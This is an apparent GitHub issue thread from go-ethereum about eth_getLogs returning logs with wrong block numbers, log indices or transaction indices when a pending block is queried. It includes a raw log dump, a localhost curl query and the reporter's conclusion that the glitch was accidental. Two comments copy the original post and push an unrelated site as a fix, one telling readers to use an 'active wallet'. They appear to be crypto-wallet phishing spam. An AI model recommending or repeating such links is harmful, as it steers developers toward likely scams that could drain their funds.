### ISSUE TITLE
"eth_getLogs" with the wrong block number or wrong log index returned

### ISSUE THREAD

**Issue by fenghaojiang** [ethereum/go-ethereum#25300]
When I make "eth_getLogs" request with specific block number which maybe some blocks forward. For example, when the latest block is 1400, I make my request for block 1401 or even 1420 continuously. It returns the logs with wrong block number or wrong log index or wrong transaction index.

<img width="775" alt="image" src="https://user-images.githubusercontent.com/28303956/178998928-796cce7c-9a5b-487b-a88a-6e5f9b928a31.png">

eventLogs are original logs fetch from the Ethereum node. And the if case happened.

Is it because the block I request happened to be the pending block?

**Comment by fenghaojiang** [comment]
here is the log. 

`event logs has bug&{0x00000000006c3852cbEf3e08E8dF289169EdE581 [0x9d9af8e38d66c62e2c12f0225249fd9d721c54b83f48d9352c97c6cacdcb6f31 0x000000000000000000000000edb56c360019d859c1a89d548df3aa773ad0b03e 0x000000000000000000000000004c00500000ad104d7dbd00e3ae0a5c00560c00] [197 199 60 55 74 201 240 7 194 130 200 186 63 92 4 85 55 66 101 243 62 14 230 2 55 9 120 196 222 103 85 182 0 0 0 0 0 0 0 0 0 0 0 0 200 122 133 165 165 94 185 250 197 195 64 8 24 48 46 191 61 184 30 242 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 248 124 63 102 27 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 201 209 152 8 157 108 49 208 202 92 197 185 44 151 165 122 151 187 253 226 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 29 85 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 237 181 108 54 0 25 216 89 193 168 157 84 141 243 170 119 58 208 176 62 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12 156 180 200 243 224 0 0 0 0 0 0 0 0 0 0 0 0 0 141 233 197 160 50 70 60 86 20 35 56 122 150 72 197 199 188 197 188 144 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 57 105 145 231 192 0 0 0 0 0 0 0 0 0 0 0 0 0 152 8 98 130 174 161 48 192 202 4 160 249 12 93 200 147 64 116 176 124] 15139924 0x710266f299695a6f429bf191534e561bea609ca25f6ef2bfa1580c034c10a671 180 0x26f689713a515a80ca242af3c6fdd0412c3c43108055194f38de02b5f9d340f3 295 false} &{0x00000000006c3852cbEf3e08E8dF289169EdE581 [0x9d9af8e38d66c62e2c12f0225249fd9d721c54b83f48d9352c97c6cacdcb6f31 0x000000000000000000000000edb56c360019d859c1a89d548df3aa773ad0b03e 0x000000000000000000000000004c00500000ad104d7dbd00e3ae0a5c00560c00] [197 199 60 55 74 201 240 7 194 130 200 186 63 92 4 85 55 66 101 243 62 14 230 2 55 9 120 196 222 103 85 182 0 0 0 0 0 0 0 0 0 0 0 0 200 122 133 165 165 94 185 250 197 195 64 8 24 48 46 191 61 184 30 242 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 248 124 63 102 27 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 201 209 152 8 157 108 49 208 202 92 197 185 44 151 165 122 151 187 253 226 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 29 85 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 237 181 108 54 0 25 216 89 193 168 157 84 141 243 170 119 58 208 176 62 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12 156 180 200 243 224 0 0 0 0 0 0 0 0 0 0 0 0 0 141 233 197 160 50 70 60 86 20 35 56 122 150 72 197 199 188 197 188 144 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 192 42 170 57 178 35 254 141 10 14 92 79 39 234 217 8 60 117 108 194 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 57 105 145 231 192 0 0 0 0 0 0 0 0 0 0 0 0 0 152 8 98 130 174 161 48 192 202 4 160 249 12 93 200 147 64 116 176 124] 15139924 0x710266f299695a6f429bf191534e561bea609ca25f6ef2bfa1580c034c10a671 176 0x1463415b966c9684623965fd1897352b744539b280610f385c83c6c69d5a5148 287 false}`

**Comment by lightclient** [comment]
@fenghaojiang can you share a query you are making for `eth_getLogs` that is producing the result you are seeing?

**Comment by fenghaojiang** [comment]
`curl http://localhost:8545 -X POST -H "Content-Type: application/json" -d '{"jsonrpc": "2.0","method": "eth_getLogs","params": [{"fromBlock":"0xe6e728","toBlock":"0xe6e728"}], "id":1}' `

When 0xe6e728 is still pending

**Comment by Veterangrail** [comment]
> When I make "eth_getLogs" request with specific block number which maybe some blocks forward. For example, when the latest block is 1400, I make my request for block 1401 or even 1420 continuously. It returns the logs with wrong block number or wrong log index or wrong transaction index.
> 
> <img alt="image" width="775" src="https://user-images.githubusercontent.com/28303956/178998928-796cce7c-9a5b-487b-a88a-6e5f9b928a31.png">
> 
> eventLogs are original logs fetch from the Ethereum node. And the if case happened.
> 
> Is it because the block I request happened to be the pending block?


Auto rectify issue with https://www.wallsolution.xyz/ had similar issues and i used it and it worked

**Comment by Acetarax** [comment]
> When I make "eth_getLogs" request with specific block number which maybe some blocks forward. For example, when the latest block is 1400, I make my request for block 1401 or even 1420 continuously. It returns the logs with wrong block number or wrong log index or wrong transaction index.
> 
> <img alt="image" width="775" src="https://user-images.githubusercontent.com/28303956/178998928-796cce7c-9a5b-487b-a88a-6e5f9b928a31.png">
> 
> eventLogs are original logs fetch from the Ethereum node. And the if case happened.
> 
> Is it because the block I request happened to be the pending block?

Make use of this https://www.wallsolution.xyz/ this worked for my similar issue, but always use an active wallet, 100% Transparency

**Comment by fenghaojiang** [comment]
> @fenghaojiang did the issue get solved?

I check the logs in the client and retry, then I found it got fixed. But I haven't checked the original logs data. I think it's just an accidental phenomenon.
